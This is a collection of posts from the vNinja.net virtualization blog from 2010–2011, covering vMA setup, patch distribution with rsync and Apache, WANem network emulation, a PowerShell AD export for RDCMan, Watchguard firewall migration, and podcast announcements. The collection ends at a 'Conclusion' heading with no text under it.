Since everyone, and their mother, has already blogged and reviewed it I don’t see much value in me doing the same. What I can say though, is that the first impression is pretty great.
It looks good, works well and might be one of the apps that finally gives me an actual use case for the iPad. The feature set of the client is pretty basic so far, but it does provide you with a quick overview of your environment. I do agree with Juan Manuel Rey / @jreypo’s thoughts in his tweet though: @h0bbel I'm not saying is no fun or cool but I believe a Linux or OS X client is more needed and of course more productive We do need a cross-platform vCenter Client, and hopefully the iPad client is a step in that direction. Considering that it uses the vCMA as its backend, this might pave the way for other solutions using the same API to connect to VMware vCenter. VMware vSphere Client for iPad posts #

- VMware vSphere Client for iPad - Control your datacenter from the couch by Eric Sloof
- Free VMware vSphere Client for iPad Available by Jason Boche
- VMware vSphere client for iPad app released by Gregg Robertson
- vSphere Client for iPad – Another step forward in mobile administration by Arnim van Lieshout
- VMware vSphere client for iPad released too early by Gabrie van Zanten

--- # Custom Dictionary Synchronization with Dropbox URL: https://vNinja.net/howto/custom-dictionary-syncronization-with-dropbox/ Date: 2011-03-13 Author: christian Tags: Dropbox, Microsoft Office, Productivity, Tips & Tricks In the last couple of weeks I’ve been using Microsoft Word 2010 a lot more than I have previously, and at the same time I’ve been switching computers a lot, making it somewhat of an annoyance that a lot of the words I use in my documents are not recognized and get marked with a wiggly red line underneath. If only there was a way to keep the custom dictionary synchronized between computers. And guess what? There is. To the cloud! Setting up custom dictionary synchronization between several computers is pretty easy, at least if you have a Dropbox account. If you don’t, sign up now via this affiliate link to give me some extra space to play with at the same time.
Find your existing custom.dic file. Custom.dic is the local file Microsoft Office keeps your custom additions to the standard dictionary in. Usually it’s located in C:\Users\{username}\AppData\Roaming\Microsoft\UProof. Copy the file to a location within your Dropbox folder structure. I’ve chosen My Dropbox\Applications\Office. I renamed the file to myCustom.dic to differentiate it from the local one, but that’s not required. Configure Microsoft Word 2010 to use the Dropbox synchronized file by going to File -> Options -> Proofing and clicking on the “Custom Dictionaries…” button. This brings up a new window where you can change your custom dictionary file location. Click on “Add”. Browse to your Dropbox located custom.dic file and add it. Now you have two custom dictionaries selected. I normally opt for using just one to make sure I get all my additions synchronized. Make your changes, and click on “OK”. Repeat the Word configuration step on the different computers you use, and the custom dictionary will automatically sync between them. Of course, this requires that you have Dropbox installed as well. Close the “Word Options” window, and enjoy life with synchronized custom dictionaries in Microsoft Office 2010. --- # Using rsync to Distribute Patches to a Remote vMA URL: https://vNinja.net/virtualization/using-rsync-to-distribute-patches-to-remote-a-vma/ Date: 2011-03-08 Author: christian Tags: ESX, ESXi, Ops, rsync, vCLI, Virtual Appliance, vMA, VMware, vSphere I recently posted Using vMA as a local vSphere Patch Repository, where I outlined how you can use your vMA instances as local file repositories for updates. This post is a continuation of that concept, but this time I’ll take it a step further and utilize rsync to make sure my vMA instances all contain the same set of patches. Rsync is great for this, as it handles fast incremental file transfers, which is a real time and bandwidth saver in my particular scenario.
So, the premise is that you have one central vMA instance, and one or more remote vMA instances that should pull updates from the centrally located one. Installing rsync in vMA # Sadly, rsync isn’t included in vMA by default. To get it installed, we need to edit some files inside of vMA. Since vMA is CentOS based, this means configuring yum repositories, and thankfully the brilliant William Lam over at virtuallyGhetto has already done the hard work for us. In his post named Automate Update Manager Operations using vSphere SDK for Perl + VIX + PowerCLI + PowerCLI VUM, William explains which files to edit to create a valid repository configuration for installation of official packages directly from CentOS. Warning: Do this at your own risk; I have not checked, but I think this falls under the “unsupported” tab at VMware. Configuring YUM in vMA # These instructions are pretty much copied from William’s post, but added here for context: Creating the repository configuration file # To create the file in the correct directory, run the following command:

[vi-admin@vMA /]$ sudo vi /etc/yum.repos.d/centos-base.repo
Password:

Add the following lines to the repository file:

[base]
name=CentOS-5 - Base
baseurl=http://mirror.centos.org/centos/5/os/x86_64/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5

[update]
name=CentOS-5 - Updates
baseurl=http://mirror.centos.org/centos/5/updates/x86_64/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5

Exit the vi editor by hitting Esc, typing :wq, and hitting Enter. That saves the file and exits the editor. Installing rsync via yum # Now comes the easy part, actually installing rsync inside vMA.
All you have to do is enter the following command:

[vi-admin@vMA /]$ sudo yum -y install rsync

The installation starts, and you should see output similar to the following:

Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
Setting up Install Process
Parsing package install arguments
Resolving Dependencies
--> Running transaction check
---> Package rsync.x86_64 0:2.6.8-3.1 set to be updated
--> Finished Dependency Resolution

Dependencies Resolved

====================================================================================
 Package           Arch           Version            Repository       Size
====================================================================================
Installing:
 rsync             x86_64         2.6.8-3.1          base             235 k

Transaction Summary
====================================================================================
Install      1 Package(s)
Update       0 Package(s)
Remove       0 Package(s)

Total download size: 235 k
Downloading Packages:
rsync-2.6.8-3.1.x86_64.rp 100% |=========================| 235 kB    00:01
Running rpm_check_debug
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
  Installing     : rsync                          [1/1]

Installed: rsync.x86_64 0:2.6.8-3.1
Complete!
[vi-admin@vMA /]$

And there it is, rsync installed inside vMA! Configuring rsync to fetch upgrades from central vMA # Now that we have rsync installed inside vMA, we need to configure it to fetch the updates from a central vMA instance. Rsync needs to be installed at both ends of the pipe, so if you haven’t already done so, configure your “master vMA” the same way as mentioned above. Now that “both ends” of the pipe have rsync installed, we can run it from the “client vMA” to pull down all the files currently in the repository on the “master vMA”.

[vi-admin@vMA /]$ sudo rsync -r vi-admin@192.168.5.57:/var/www/html/repo/* /var/www/html/repo
The authenticity of host '192.168.5.57 (192.168.5.57)' can't be established.
RSA key fingerprint is 3f:af:7c:53:5a:15:47:56:b8:25:77:79:14:b2:f5:2f.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.5.57' (RSA) to the list of known hosts.
vi-admin@192.168.5.57's password:
[vi-admin@vMA /]$

The command runs for a while, and when it finishes you should see that the current contents of the “master vMA” repository are now located in the “client vMA” repository as well:

[vi-admin@vMA repo]$ ls -la
total 210988
drwxr-xr-x 2 root root      4096 Mar  8 18:51 .
drwxr-xr-x 4 root root      4096 Mar  8 18:50 ..
-rw-r--r-- 1 root root         0 Mar  8 18:51 testfile
-rw-r--r-- 1 root root         0 Mar  8 18:51 testfile1
-rw-r--r-- 1 root root         0 Mar  8 18:51 testfile2
-rw-r--r-- 1 root root         0 Mar  8 18:51 testfile3
-rw-r--r-- 1 root root 215820281 Jan 27 19:15 update-from-esxi4.1-4.1_update01.zip
[vi-admin@vMA repo]$

Conclusion # There is a lot more you can do with rsync, like replicating files both ways, controlling bandwidth usage, and using ssh keys to avoid username/password prompts, something that is required if you want to fully automate this process. I will not cover that, at least not right now, so head over to the rsync site to read up on the documentation for more advanced use cases. Even if I’ve barely touched the features rsync provides, it is clear that this is a way for admins to centrally manage distribution of vSphere patches to remote locations, even if the bandwidth is low and the latency high. Rsync provides us with ways to overcome the patching issues that you might see in poorly networked environments, and it can certainly help vAdmins keep their environments patched and current, and that has to be a good thing™ --- # Using vMA as a local vSphere Patch Repository URL: https://vNinja.net/virtualization/using-vma-as-a-local-vsphere-patch-repository/ Date: 2011-03-07 Author: christian Tags: ESX, ESXi, Ops, vCLI, Virtual Appliance, vMA, VMware, vSphere I like using http as the transport protocol when patching my vSphere hosts.
It’s easy to use and in most cases immediately available over most networks. Since I want to use http as the transport, we need to make vMA work as an http server. Starting Apache inside vMA # Luckily, the Apache http daemon is installed by default in vMA, and to utilize it all you have to do is start it! Log on to vMA with your favorite SSH client and run the following command to start the Apache HTTP Daemon:

[vi-admin@vMA /]$ sudo service httpd start
Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[  OK  ]
[vi-admin@vMA /]$

Never mind the warning message it displays; for our purposes that’s not an issue and we can safely ignore it. By default the files served by Apache are located in /var/www/html, so we’ll head over there to create a new directory:

[vi-admin@vMA /]$ cd /var/www/html/
[vi-admin@vMA html]$ sudo mkdir repo

We’ve now created the repo directory inside the Apache docroot. Now we need to add some patches to that directory, to make them available for the vihostupdate or esxupdate commands we can use to patch our hosts. In my lab, I used the update-from-esxi4.1-4.1_update01 patch bundle from vmware.com To download the patch into the new repo directory created above, run the following commands:

[vi-admin@vMA html]$ cd /var/www/html/repo/
[vi-admin@vMA repo]$ sudo wget https://hostupdate.vmware.com/software/VUM/OFFLINE/release-260-20110127-912579/update-from-esxi4.1-4.1_update01.zip
Password:
--15:34:32-- https://hostupdate.vmware.com/software/VUM/OFFLINE/release-260-20110127-912579/update-from-esxi4.1-4.1_update01.zip
Resolving hostupdate.vmware.com... 88.221.164.7
Connecting to hostupdate.vmware.com|88.221.164.7|:443... connected.
HTTP request sent, awaiting response...
200 OK
Length: 215820281 (206M) [application/zip]
Saving to: `update-from-esxi4.1-4.1_update01.zip'

100%[===============================================================================================================>] 215,820,281 919K/s in 3m 54s

15:38:26 (901 KB/s) - `update-from-esxi4.1-4.1_update01.zip' saved [215820281/215820281]

This downloads the patch bundle, using the wget command, to the current directory. Now, to make sure your downloaded patch bundle is available via the web server, open http://vMA-IP/repo/ and you should see the directory contents listed. Your browser should display something similar to this: Before patching a host, power off or migrate any virtual machines that are running on the host and place the host into maintenance mode. Scan host for update compatibility #

[vi-admin@vMA repo]$ vihostupdate --server 10.0.100.20 --scan --bundle http://10.0.101.14/repo/update-from-esxi4.1-4.1_update01.zip
Enter username: root
Enter password:
The bulletins which apply to but are not yet installed on this ESX host are listed.

---------Bulletin ID--------- ----------------Summary-----------------
ESXi410-201101201-SG          Updates the ESXi 4.1 firmware
ESXi410-201101202-UG          Updates the ESXi 4.1 VMware Tools
ESXi410-201101223-UG          3w-9xxx: scsi driver for VMware ESXi
ESXi410-201101224-UG          vxge: net driver for VMware ESXi
ESXi410-Update01              VMware ESXi 4.1 Complete Update 1

Install updates to host #

[vi-admin@vMA repo]$ vihostupdate --server 10.0.100.20 --install --bundle http://10.0.101.14/repo/update-from-esxi4.1-4.1_update01.zip
Enter username: root
Enter password:
Please wait patch installation is in progress ...
The update completed successfully, but the system needs to be rebooted for the changes to be effective.
[vi-admin@vMA repo]$

While the update runs, you can also follow its progress in the vSphere Client. When the patch has completed and the host has been rebooted, you can run the scan command again to make sure all of the patches are installed and no longer listed as required. Management # Now, downloading the patches this way for each vMA instance you have (especially if you have several remote sites) is not very efficient. Sure, you could place a central repository at a central site and use that as your central update repository. In that scenario you might as well just use VMware vCenter Update Manager and not have to manage your updates via vMA at all. In some cases though, you would want to have the remote hosts install their updates from a local repository. One such case might be if you have remote locations with low bandwidth/high latency links that you don’t want to stress with the update downloads. I’m investigating a possible solution for that as well, and I’ll post that as soon as I have a working proof of concept up and running. Another thing to note is that when you restart vMA, the http service will be stopped again. If you want it to autostart each time vMA boots, issue the following command:

[vi-admin@vMA repo]$ sudo ntsysv
Password:

This brings up a screen where you can choose which daemons should start at boot time inside of vMA. Find httpd, select it and hit the OK button. The next time vMA boots, the Apache web server starts with it. --- # Installing vSphere Management Assistant (vMA) URL: https://vNinja.net/virtualization/installing-vsphere-management-assistant-vma/ Date: 2011-02-28 Author: christian Tags: ESX, ESXi, Ops, vCLI, Virtual Appliance, vMA, VMware, vSphere The vMA is a Virtual Appliance that you can download from VMware. Its primary function is to enable command line based management of your ESX/ESXi systems.
Basically this is a pre-packaged virtual machine that includes vCLI and the vSphere SDK for Perl, which means that you don’t have to build your own management VM or install these tools locally on a management station. vMA is in many regards seen as a replacement for the ESX Service Console, which is no longer present in ESXi. Downloading vSphere Management Assistant (vMA) # Basically there are two methods you can use when deploying vMA. Download the .OVF file to your local machine and upload it to your ESX/ESXi host. This is useful if you have already downloaded the vMA appliance and plan on deploying it to several hosts/clusters. This saves you from downloading it several times, and you can even use PowerCLI to automate the deployment of vMA, but I’m not going into that scenario this time around. Deploy the .OVF file directly from vmware.com, via the vSphere Client, to your host. In this post, I’ll focus on how to deploy vMA using method 2 - Direct Deployment. Direct Deployment of vMA # Start your vSphere Client and connect to your host or vCenter. Navigate to “File”, then find and select the “Deploy OVF template” option. This starts the OVF deployment wizard. In the “Deploy from a file or URL” text box, enter the following URL: http://download3.vmware.com/software/vma/vMA-4.1.0.0-268837.ovf and click on “Next”. Note: This URL is valid at the time of writing, but might change at a later date when a new version is released by VMware. The URL is now validated, and you are presented with the OVF Template Details window, where you can review the settings defined in the OVF file. Click “Next” to view and accept the VMware EULA. After reading it thoroughly, click on “Accept” and then on “Next” again to continue. Next up is the “Name and Location” screen, where you can customize the name of your vMA instance. If you are deploying several vMA instances to the same host/vCenter, you will need to change this to prevent naming conflicts.
After naming your vMA, click on “Next” again, and you’ll be presented with the “Disk Format” screen. Here you can select between thin provisioned or thick provisioned disks; for this installation I chose to change it to thin provisioned, but the default is thick provisioned disks. After making your selection, we once again click on “Next” and now we’re nearly there! Review the summary screen to make sure you have selected the right options and click on “Finish” to finally start the download and deployment of your vMA. The download starts, and a nice little progress window shows you how far along you are. Of course, the time it takes to deploy vMA this way is highly dependent on available bandwidth and download speeds. In this particular environment the download is estimated to take approximately 39 minutes. Tip: If you want to deploy vMA in this manner to several hosts, you can place the downloadable vMA .OVF file on an accessible file share or http server and provide that local path or URL to your host via the vCenter Client as well. This is particularly useful in scenarios where your vCenter Client doesn’t have internet access, or if you want to speed up deployment by downloading it only once, but without scripting it. Once the vMA has finished downloading and installing, it will pop up inside your vSphere Client on the host you deployed it to. vMA Initial Configuration # The first time you start vMA, it launches a configuration wizard to help you configure it. The wizard guides you through the network setup and setting the vi-admin user password. And there it is. Now you can use your favorite SSH client (like PuTTY) to connect to the vMA, or use the console in the vSphere Client. For details on using vMA and vCLI see the vSphere Management Assistant (vMA) site. You can even add ESX/ESXi and vMA to your Active Directory and use that as an authentication source, but I’ll leave that for another post on another day.
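As a quick smoke test of the vCLI tooling once the wizard has finished, you can register a target host with vMA’s fastpass mechanism so subsequent commands run without credential prompts. A minimal sketch, assuming a host named esxi01.example.local (the hostname is hypothetical; vifp and vifptarget ship with vMA):

```shell
# Register an ESX/ESXi host with fastpass (prompts once for credentials).
sudo vifp addserver esxi01.example.local

# Make it the current target for this shell session.
vifptarget -s esxi01.example.local

# Any vCLI command now runs against the target without --server/--username,
# e.g. listing the host's physical NICs:
vicfg-nics -l
```

If the last command returns the host’s NIC list, both the appliance networking and the vCLI stack are working.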
--- # Passion in IT URL: https://vNinja.net/rant/passion-in-modern-it-organizations/ Date: 2011-02-20 Author: christian Tags: Community, Virtualization Bob Plankers, aka The Lone Sysadmin, has posted a series of posts on “the blame game” in modern IT organizations (Blame, Understanding Blame and Preventing Blame). Bob’s posts are most excellent, and well worth a thorough read. Feel free to head on over and read them now, this post will be waiting right here when you come back. Are you back yet? In fact, Bob’s excellent rants have inspired me to write my own! No, I’m not going to talk about blame in IT. I have another little pet peeve, and that’s passion. **Passion** (from the Ancient Greek verb πάσχω (paskho) meaning to suffer or to endure) is an emotion applied to a very strong feeling about a person or thing. Passion is an intense emotion, a compelling feeling, enthusiasm, or desire for something. The term is also often applied to a lively or eager interest in or admiration for a proposal, cause, or activity or love. Passion can be expressed as a feeling of unusual excitement, enthusiasm or compelling emotion towards a subject, idea, person, or object. A person is said to have a passion for something when he has a strong positive affinity for it. A love for something and a passion for something are often used synonymously. Source: [wikipedia](http://en.wikipedia.org/wiki/Passion_%28emotion%29) I’m a passionate guy, in just about every sense of the word. I’m passionate about my family and I go nuts when my favorite sports teams do well (those of you that follow my twitter stream will certainly recognize this!). But here is the kicker; I’m also very passionate about my work. Call it childish excitement or even misplaced enthusiasm, I don’t really care. I have a strong burning passion for doing whatever I can, within the limits of my current employer, to develop and manage the best IT infrastructure I possibly can.
I’ve been like this for as long as I can remember, and it’s probably a genetic defect of some sort, and that’s fine. I know it’s definitely fine with my employer too, but that does go without saying, doesn’t it? Of course, this passion and commitment flows over into hours and hours of unpaid work, done in my spare time, but for now that’s a price I’m personally willing to pay. As long as I’m able to juggle all of this, and my family responsibilities, it makes me a very happy camper indeed. This sense of passion towards your professional being is something that has really attracted me to the general VMware Virtualization Community. People who are recognized as industry experts happily share their knowledge and get involved in lengthy discussions with us minions, without expecting anything back. This encourages others to share their knowledge too, and to actually dare to share their own experiences and ask questions. There is no sense of non-sharing to protect their own status as experts, but rather an abundance of friendly, helpful and generally awesome people who happily help you out if you just engage them. So, this is my thank you post to everyone in the wide, wide world of VMware virtualization. You all rock, and you fuel my passion with jet propellant. Ok, so I get to play the blame game after all: **I’m blaming you lot for really igniting the dormant passion in each and every isolated vInfrastructure Admin in the world. The combined hive-mind is awesome, and you are all a significant part of it.** --- # vSoup Episode #4 now available URL: https://vNinja.net/news/vsoup-episode-4-now-available/ Date: 2011-02-10 Author: christian Tags: Podcast, vSoup The fourth edition (Big Fat Pipes with Bob) of the vSoup podcast is now available. This time we had the honor of having Bob Plankers as a guest. Bob runs The Lone Sysadmin, where his recent post “Blame” really resonated well with me personally.
The fact of the matter is that in many cases Bob is right, virtualization admins end up being blamed for everything. No matter whose fault it actually is, though, I’m the one-stop shop now for blame. How very, very true. --- # vSoup Episode #3 now available URL: https://vNinja.net/news/vsoup-episode-3-now-available/ Date: 2011-01-24 Author: christian Tags: Podcast, vSoup The third episode of vSoup has been spotted in the wild. Head on over to vSoup.net to grab it while it’s still warm. Or, you can frantically refresh your iTunes feed until it pops up there. Either way, it’s alive! --- # Remote Desktop Connection Manager (RDCMan) + Powershell = Win URL: https://vNinja.net/howto/remote-desktop-connection-manager-rdcman-powershell-win/ Date: 2011-01-20 Author: christian Tags: Ops, Powershell, RDCMan, Windows Remote Desktop Connection Manager is a great tool from Microsoft which enables you to keep track of all your RDP sessions and targets in a nice GUI. One of the things it’s lacking, though, is some sort of Active Directory connection that allows you to import all your server objects directly, so you don’t have to manually add/remove the servers as your infrastructure changes over time. In an attempt to bridge that gap, I’ve made a very small PowerShell script that queries your Active Directory for server objects and dumps their names into a text file that you can import into RDCMan. This is a very simple solution, but works great in my environment. GetAllServers.ps1 #

Import-Module ActiveDirectory

$servers = Get-ADComputer -LDAPFilter "(operatingsystem=*Windows Server*)" | select name,dnshostname
$Date = Get-Date
$filename = "Servers-{0}{1:d2}{2:d2}" -f $date.year,$date.month,$date.day

foreach ($server in $servers) {
    $servername = $server.name
    #Customize this for your environment
    $servername | Out-File -append -encoding ASCII <path>\$filename.txt
}

In short, replace the path in the Out-File line, and you should be able to run the script.
It will then create a file called servers-{current-date}.txt in the path you have specified. This is a simple text file with one server defined on each line. The file can then be imported into RDCMan by going to the Edit menu and selecting Import Servers. This brings up the Import Servers dialog box, where you can browse to the file that the PowerShell script created. Click the Import button and all your servers should now be listed in RDCMan. The next time you need to update, delete the existing servers, re-run the PowerShell script and import again. While this isn’t a fully automated solution, and I really wish RDCMan could do this for you by querying AD directly, finding new servers and removing the ones that are no longer present, it is a quick way to get your current servers into RDCMan without manually creating each and every entry.

## Update

After I initially posted this, Jan Egil Ring pointed me to his solution, which is a bit more elaborate. Have a look at his “Dynamic Remote Desktop Connection Manager connection list”, which is how it really should be done…

---

# Powershell: Scripting Best Practices Analyzer remotely

URL: https://vNinja.net/windows/powershell-scripting-best-practices-analyzer-remotely/
Date: 2011-01-18
Author: christian
Tags: Ops, Powershell, Remoting

Jan Egil Ring over at blog.powershell.no has created a great PowerShell script that lets you run the Microsoft Best Practices Analyzer on remote Windows Server 2008 R2 machines. In short, Invoke-BPAModeling.ps1 queries your Active Directory for any machines that run Windows Server 2008 R2, runs BPA on them (if Windows PowerShell Remoting is enabled) and emails you the report. A great tool that should be in every Windows Server admin’s tool-belt, and one that should probably also be set up as a scheduled job to make sure you stay up to date on your servers’ status.
---

# vSoup Episode #2 now available

URL: https://vNinja.net/news/vsoup-episode-2-now-available/
Date: 2011-01-17
Author: christian
Tags: Podcast, vSoup

The second episode of vSoup is now available. Head on over to vSoup.net to get your fix. Chris, Ed and myself keep rambling on, this time about blogger recruitment, high availability, security and the HP Proliant MicroServer. Enjoy!

---

# Volume Activation Management Tool (VAMT) article

URL: https://vNinja.net/news/volume-activation-management-tool-vamt-article/
Date: 2011-01-16
Author: christian
Tags: Licensing, Microsoft, Ops, Petri

I’ve had another article posted on Petri IT Knowledgebase! The Volume Activation Management Tool (VAMT) is a free tool from Microsoft that can help administrators perform licensing and activation related tasks from a single viewpoint. VAMT is currently available in version 2.0 and supports a number of Microsoft products and operating systems. Read the rest of the article, called License & Activation Management with Volume Activation Management Tool (VAMT), on petri.co.il

---

# Migrating from Watchguard Firebox X to XTM Series Firewalls

URL: https://vNinja.net/network/migrating-from-watchguard-firebox-x-to-xtm-series-firewalls/
Date: 2011-01-07
Author: christian
Tags: firewall, Ops, watchguard

Watchguard has recently retired their X series of firewalls and replaced them with their new lineup of XTM boxes. I took this opportunity to replace my X series firewalls with some from the new lineup, and found a neat way to migrate your existing configuration from old to new in a few very easy steps.

Note: Normally I would not recommend migrating your configuration in this manner. In my mind you should always rebuild rules when replacing your firewall, as it is the perfect time to review and do some QA.
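The core of the migration is a simple find-and-replace of the firewall model string in the exported XML config. The Notepad++ edit could also be sketched in PowerShell; this is a rough, hedged example only — the file paths and model strings below are placeholders, and yours will differ:

```powershell
# Assumed example paths and model names - adjust for your environment.
$oldConfig = 'C:\configs\firebox-x700.xml'
$newConfig = 'C:\configs\firebox-xtm820.xml'

# Replace every occurrence of the old model string and save under a new
# name, leaving the original export untouched as a fallback.
(Get-Content $oldConfig) -replace 'x700', 'XTM820' |
    Set-Content $newConfig
```

Keeping the original export untouched means you always have a known-good config to fall back to if the new firewall rejects the edited file.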
## Migrating your existing config

I used a laptop to do the actual configuration, to make sure that I didn’t get any conflicts in my production environment when setting up the new one with an old config. By default the Watchguard firewalls come with DHCP enabled on eth1 (trusted), and blindly plugging that into your existing infrastructure might not be the best of ideas. Also, remember that the config includes the firewall IP address, and what happens if you have two firewalls with identical IP addresses in your network? Let’s just agree that it’s not a pretty sight.

## Step-by-Step Guide

1. Save your current (old) configuration from your live production firewall
2. Install the latest version of Watchguard System Manager
3. Activate the new firewall and retrieve the feature key from watchguard.com
4. Disconnect the laptop from the existing production environment, and connect it directly to the new XTM firewall on eth1 (trusted)
5. Run through the Quick Setup Wizard on the new XTM firewall
6. Open the new config XML file in a suitable editor. I used Notepad++
7. Find the lines that read x700 (your model might differ)
8. Replace x700 with XTM820 (again, your model might differ) and save the config file under a new name
9. Connect Watchguard System Manager to the new firewall and start Policy Manager
10. Open the freshly edited config file and save it to the Firebox (if prompted to convert the config file to the new format, do so)
11. Add the new feature key
12. Save to the Firebox

And there it is. All existing configuration migrated from the old Watchguard X series firewall to a shiny new XTM series box. You should now be able to do a quick switch between the new and old firewalls, and all your services should be available immediately. If not, you can always revert to the old firewall and troubleshoot the new one.

---

# So, what is this vSoup thing?
URL: https://vNinja.net/news/so-what-is-this-vsoup-thing/
Date: 2011-01-04
Author: christian
Tags: Podcast, vSoup

Sometimes things just happen, and before you know it you’re sitting in your in-laws’ living room talking to an Englishman and an American via Skype. And to top it off: it’s all being recorded. And to make matters even worse, we decided to try and make it a regular thing. The recordings, that is, not the “in your in-laws’ living room” thing; that was a one-off for sure. What I’m trying to say here is that yours truly, Ed Czerwin and Chris Dearden have decided that we want to be rock stars and start our own little virtualization related podcast. The first episode of vSoup is now available, so head on over to vSoup.net to check it out, and remember, we are all virgins here. Be gentle.

---

# State of the vNinja: 2010

URL: https://vNinja.net/news/state-of-the-vninja-2010/
Date: 2010-12-30
Author: christian

Is 2010 over already? I guess it’s true that time flies when you’re having fun! 2010 has been a great year for me, both personally and professionally. I won’t bore you to death with personal issues, but as far as the professional side goes, you’ll just have to bear with me. 2010 was the year I really feel that I got a lot of good work done, and some of it represents really significant changes for my organization, which is in a way better state IT-wise now than in 2009. I can’t take credit for all that on my own; I have some very competent coworkers that are equally to blame/praise for the work we have been able to do in 2010. By the looks of it, 2011 will be even better! One major thing stands out when I think of what happened in the last 12 months: VMworld Europe 2010. It still amazes me how important VMworld feels, even 4 months later. I met some amazing people face to face, finally, and that alone was worth the trip. You know who you are!
I had one, albeit pretty minor, public speaking job in 2010, where I did a walk-through of my company’s disaster recovery setup, based on, amongst other things, VMware vSphere and Veeam Backup & Replication. I hadn’t done any of that in a while, and it was real fun being asked to do it again. Hopefully there will be more opportunities to do more of the same, and by the looks of it I might even do a similar, but much bigger, gig again in the beginning of February 2011. More details to come.

I have set a lot of personal goals for 2011, and I won’t be listing them all here as some of them are pretty personal. But I do have a plan for finally getting my VCP4 sorted, and possibly also a VCAP-DCA if my employer gives the go-ahead. I have been neglecting these certifications for way too long now. I do promise to keep posting on vNinja, and I really promise to finish off a series of posts once I start publishing them! Sadly I didn’t manage to get all my stuff sorted before the end of the year, but hopefully I’ll be able to finish the series I’ve started on pretty early in 2011.

vNinja saw a total of 32 posts in 2010, the first one in late July. This equates to roughly 6 posts a month, something I look to improve on in 2011. The visitor numbers have been amazingly good, and I hope to keep building on that as well. And who knows, you might just hear more from me in 2011 than ever before. How do you like your bowl of vSoup?

While I can’t promise to meet all my goals for 2011, I can promise one thing: There will be no seppuku in 2011, neither physical nor virtual. I’m here for the long haul, like it or not. Have a good new year everyone. I’m honored to have you as my readers, and I’ll work hard to keep it that way throughout 2011 as well.
---

# Installing and Configuring WANem Virtual Appliance

URL: https://vNinja.net/virtualization/installing-and-configuring-wanem-virtual-appliance/
Date: 2010-12-29
Author: christian
Tags: Free Tools, HowTo, Networking, Ops, Simulation, vCenter, Virtual Appliance, VMware

In a previous post, Using the WANem WAN Emulator Virtual Appliance, I talked about how I’ve successfully used WANem to emulate different WAN scenarios. Since I work for a shipping company, the ability to emulate VSAT conditions is especially useful for testing and proof-of-concept scenarios. You can use WANem in a couple of different ways; my setup is pretty simple, but it does the job perfectly.

## Downloading WANem

I have chosen to use the WANem Virtual Appliance running in a virtual machine hosted by VMware Workstation. If you don’t have Workstation handy, VMware Player will also do the job. You don’t need to use the virtual appliance, as WANem also offers a bootable ISO download that you could boot your VM from.

## Starting and configuring WANem

First off, extract the WANemv2.1.zip file, and place the virtual machine files in a known location. My choice is _c:\virtual machines_ but you will have to adjust that for your specific environment. Secondly, fire up VMware Workstation and choose the “Open existing VM or Team” option. In the file dialog box, browse to where you extracted the virtual machine files and select “Open”. I like to run the WANem VM in bridged mode, since this gives the VM its own IP address from my DHCP server. This comes in handy later when we set up what traffic we want to route through WANem. By default the VM is configured in “Bridge Mode”, which is the network mode we want, so go ahead and start the VM by pressing the “Power on this virtual machine” option. The WANem VM starts to boot up, but it stops and asks if you want to configure all network interfaces via DHCP. As I use DHCP in my network, I don’t have to specify any network information, so I hit ‘y’ to let it continue booting.
Once again the boot process stops, this time asking you to specify a root password for the VM. Provide your own password twice, and the boot process finishes. Don’t worry about the password strength, or even whether you’ll remember it later. The VM boots from a pre-configured Knoppix LiveCD, and the next time you start it, it will ask for a new password. If you don’t see the IP address that WANem has received from your DHCP server, type status and hit enter, and it will show you the IP it has been assigned. Open your favorite browser and point it to http://WANemIP/WANem (in my case this was http://192.168.5.90/WANem). And there it is, WANem is up and running. We’ll leave it as is for the time being, and start routing traffic through it.

## Running IP traffic through WANem

You have a couple of choices when it comes to routing your traffic through WANem. The easiest setup is where you set WANem as your default gateway and route all traffic through it. Remember, though, that this only comes into play if your destination is on another subnet than the one you are currently connected to. In many scenarios this isn’t desirable, and I prefer to route specific traffic through WANem rather than play around with my DHCP-assigned settings. What I usually do is drop into cmd in administrator mode, and issue the following command:

```
route add {destination IP} mask 255.255.255.255 {WANem IP}
```

This routes all traffic from the computer I run the command on through the WANem IP address, and from there it goes on to its original destination. This works for local subnet traffic as well as remote traffic, and it will not affect any other IP traffic from that computer to the rest of the network. Obviously, we need a destination as well. For this lab setup I decided to route the traffic to my local printer through WANem.
Its IP is 192.168.5.12, so the command to run inside cmd as administrator is:

```
route add 192.168.5.12 mask 255.255.255.255 192.168.5.90
```

Now, all traffic from my local computer to my printer is routed through WANem. For now, nothing much happens. WANem receives the data on its network card, and promptly sends it on its merry way to the final destination; my printer. No innocent packets have been mauled or otherwise hurt in the process, at least not so far. If you want to route all traffic to destinations outside your local subnet through WANem as well, enter the following command:

```
route add 0.0.0.0 mask 0.0.0.0 {WANem IP}
```

## Tweaking WANem settings

Finally, the fun part! Now we can start playing around with those innocent little network packets that flow through the network. Ever wanted to know what happens if you try to print to a printer over a 128 kbit WAN link? Well, now you can! I would strongly advise against trying to print your über 120-slide PowerPoint presentation at this point, but you can if you want to. Possibly. I’m not going to try to print over the link as it is now; we’ll have to settle for a little demonstration using much simpler means. The tool of choice is the ever-faithful ping. Basically, I’ll demonstrate how WANem fiddles with your network traffic. First off, just a normal ping of my printer with no edits done by WANem whatsoever: As you can see, as this is on my local network, the response time is great at 1ms with no dropped packets. Now we can open the WANem web interface and start messing about. Click on “Advanced Mode” and then on the “Start” button to bring up the web interface. The next screen brings up a lot of options, and we’re going to tweak a couple of them. I set the “Delay Time (ms)” to 200ms and the “Loss %” to 25%, and hit “Apply Settings”. When we turn back to our cmd window, we should see instant results in our ping monitor.
As you can see, the response time is now approximately 200ms and the packet loss is about 25%, in accordance with the settings I’ve applied. Of course, there are lots of other settings to play around with as well. WANem also allows you to save your settings, so if you find your own perfect little real-world emulation scenario you can export the settings and re-apply them later if you wish.

## Cleaning house

When testing is over, be sure to remove your static route(s) again. If you don’t, and you power down your WANem appliance, you simply will not be able to reach your destination(s) until it’s powered on again. Thankfully, removing the static routes is as easy as adding them in the first place. The command to run, in an administrative mode cmd, is:

```
route delete {destination IP}
```

## Conclusion

